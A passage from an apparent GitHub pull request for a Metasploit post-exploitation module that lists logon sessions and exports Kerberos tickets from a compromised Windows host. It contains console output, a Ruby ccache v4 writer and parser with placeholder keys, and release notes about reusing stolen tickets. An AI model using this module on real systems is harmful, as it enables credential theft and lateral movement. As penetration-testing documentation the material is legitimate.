[*]   LogonTime:             2023-12-07 08:15:36 -0900
[*] LogonSession LUID: 0x0000003e5
[*]   User:                  NT AUTHORITY\LOCAL SERVICE
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Service (5)
[*]   LogonTime:             2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x000012e7b
[*]   User:                  Window Manager\DWM-1
[*]   Session:               1
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x000012e22
[*]   User:                  Window Manager\DWM-1
[*]   Session:               1
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x0000003e4
[*]   User:                  KERBEROS\MSF$
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Service (5)
[*]   LogonTime:             2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000ce7b
[*]   User:                  Font Driver Host\UMFD-0
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000ce28
[*]   User:                  Font Driver Host\UMFD-1
[*]   Session:               1
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             Interactive (2)
[*]   LogonTime:             2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000c35f
[*]   User:                  \
[*]   Session:               0
[*]   AuthenticationPackage: NTLM
[*]   LogonType:             UndefinedLogonType (0)
[*]   LogonTime:             2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x0000003e7 (current)
[*]   User:                  KERBEROS\MSF$
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             UndefinedLogonType (0)
[*]   LogonTime:             2023-12-07 08:15:27 -0900
[*] Post module execution completed
msf6 post(windows/manage/kerberos_tickets) > set action SHOW_LUID
action => SHOW_LUID
msf6 post(windows/manage/kerberos_tickets) > run

[*] LogonSession LUID: 0x0000003e7 (current)
[*]   User:                  KERBEROS\MSF$
[*]   Session:               0
[*]   AuthenticationPackage: Negotiate
[*]   LogonType:             UndefinedLogonType (0)
[*]   LogonTime:             2023-12-07 08:15:27 -0900
[*] Post module execution completed
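
The MIT credential cache (ccache) format that the module writes to loot and that msfconsole's `klist` reads, as an added example in plain Ruby (this is not code from the module or this PR): it writes one ccache v4 file holding a TGT entry with the same principals, etype, flag word and lifetime as the Administrator ticket in the dump above, reads it back, decodes `0x40e10000` into the same five flag names and classifies the entry as active or expired the way the `klist` status column does. The flag bit values are the RFC 4120 TicketFlags positions, the file layout follows the MIT krb5 ccache file-format description (big-endian fields, counted octet strings, realm excluded from the component count in v4), and the session key and ticket bytes are constructed placeholders.

```ruby
# Added example, not code from the Metasploit module or this PR: a minimal MIT
# ccache v4 writer and reader in plain Ruby. It builds one TGT entry shaped like
# the ones dumped above, serialises it, parses it back and classifies it the way
# msfconsole's klist does. Key and ticket bytes are constructed placeholders.
require 'stringio'

module CcacheV4
  # tktflags bit values (RFC 4120 TicketFlags; bit 0 is the MSB of the 32-bit word).
  TICKET_FLAGS = {
    0x40000000 => 'FORWARDABLE', 0x20000000 => 'FORWARDED', 0x10000000 => 'PROXIABLE',
    0x08000000 => 'PROXY', 0x00800000 => 'RENEWABLE', 0x00400000 => 'INITIAL',
    0x00200000 => 'PRE_AUTHENT', 0x00040000 => 'OK_AS_DELEGATE', 0x00010000 => 'CANONICALIZE'
  }.freeze
  NT_PRINCIPAL = 1 # KRB_NT_PRINCIPAL, for user and machine accounts
  NT_SRV_INST  = 2 # KRB_NT_SRV_INST, for krbtgt/REALM
  module_function

  def u16(n); [n].pack('n'); end             # big-endian, as in ccache v3/v4
  def u32(n); [n].pack('N'); end
  def octets(s); u32(s.bytesize) + s.b; end  # counted octet string

  # Principal: name type, component count (v4 excludes the realm), realm, components.
  def encode_principal(name, realm, type)
    comps = name.split('/')
    u32(type) + u32(comps.size) + octets(realm) + comps.map { |c| octets(c) }.join
  end

  def encode(primary, cred)
    out = "\x05\x04".b                                     # format version 4
    out << u16(12) << u16(1) << u16(8) << u32(0) << u32(0) # header: one DeltaTime tag (0, 0)
    out << encode_principal(primary[:name], primary[:realm], NT_PRINCIPAL)
    out << encode_principal(cred[:client], cred[:realm], NT_PRINCIPAL)
    out << encode_principal(cred[:server], cred[:realm], NT_SRV_INST)
    out << u16(cred[:etype]) << octets(cred[:key])         # keyblock
    out << [cred[:authtime], cred[:starttime], cred[:endtime], cred[:renew_till]].map(&:to_i).pack('N4')
    out << [0].pack('C') << u32(cred[:flags])              # is_skey, tktflags
    out << u32(0) << u32(0)                                # no addresses, no authdata
    out << octets(cred[:ticket]) << octets('')             # ticket, second_ticket
  end

  class Reader
    def initialize(bytes); @io = StringIO.new(bytes.b); end
    def eof?; @io.eof?; end
    def u8;  @io.read(1).unpack1('C'); end
    def u16; @io.read(2).unpack1('n'); end
    def u32; @io.read(4).unpack1('N'); end
    def octets; @io.read(u32).to_s; end
    def skip(n); @io.read(n); end
    def principal
      type, count, realm = u32, u32, octets
      { type: type, realm: realm, name: Array.new(count) { octets }.join('/') }
    end
  end

  def decode(bytes)
    r = Reader.new(bytes)
    raise ArgumentError, 'not a ccache v4 file' unless r.u16 == 0x0504
    r.skip(r.u16)                                          # header fields
    primary = r.principal
    creds = []
    until r.eof?
      client, server = r.principal, r.principal
      etype, key = r.u16, r.octets
      authtime, starttime, endtime, renew_till = 4.times.map { Time.at(r.u32).utc }
      is_skey, flags = (r.u8 == 1), r.u32
      r.u32.times { r.u16; r.octets }                      # addresses
      r.u32.times { r.u16; r.octets }                      # authdata
      ticket = r.octets
      r.octets                                             # second_ticket
      creds << { client: client[:name], server: server[:name], realm: server[:realm], etype: etype,
                 key: key, authtime: authtime, starttime: starttime, endtime: endtime, renew_till: renew_till,
                 is_skey: is_skey, flags: flags, flag_names: flag_names(flags), ticket: ticket }
    end
    { primary: primary, creds: creds }
  end

  def flag_names(flags); TICKET_FLAGS.select { |bit, _| (flags & bit) != 0 }.values; end
  def tgt?(cred); cred[:server].start_with?('krbtgt/'); end

  # Same three states as the status column of msfconsole's klist.
  def status(cred, now = Time.now)
    return 'not yet valid' if now < cred[:starttime]
    now >= cred[:endtime] ? '>>expired<<' : 'active'
  end

  # Constructed TGT entry with the lifetime of the Administrator ticket dumped above.
  def example_cache
    cred = { client: 'Administrator', server: 'krbtgt/KERBEROS.ISSUE', realm: 'KERBEROS.ISSUE',
             etype: 18, key: ([0x11] * 32).pack('C*'),      # aes256-cts-hmac-sha1-96, placeholder key
             authtime: Time.at(0),                          # unset, displayed as the epoch
             starttime: Time.new(2023, 12, 7, 12, 23, 37, '-09:00'),
             endtime: Time.new(2023, 12, 7, 22, 23, 37, '-09:00'),
             renew_till: Time.new(2023, 12, 14, 12, 23, 37, '-09:00'),
             flags: 0x40e10000, ticket: 'placeholder-ticket'.b }
    encode({ name: 'Administrator', realm: 'KERBEROS.ISSUE' }, cred)
  end
end
```

`CcacheV4.decode(CcacheV4.example_cache)` returns the primary principal and one credential whose `:flag_names` are `FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE`; `CcacheV4.status(cred, Time.now)` reports the same expiry the `klist` table shows once the ten-hour ticket lifetime has passed. Running `CcacheV4.decode(File.binread(path))` on one of the loot files above should work too, on the assumption (not verified here) that Metasploit's writer follows the same MIT v4 layout; files with several credentials, addresses or authorization data are handled by the same loop.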

@jheysel-r7 added the rn-modules label (release notes for new or majorly enhanced modules) Dec 7, 2023
@jheysel-r7 merged commit 3bad98a into rapid7:master Dec 8, 2023
58 checks passed
@jheysel-r7 (Contributor):

Release Notes

This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit's own cache, allowing them to be used for the duration in which they are valid.

Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)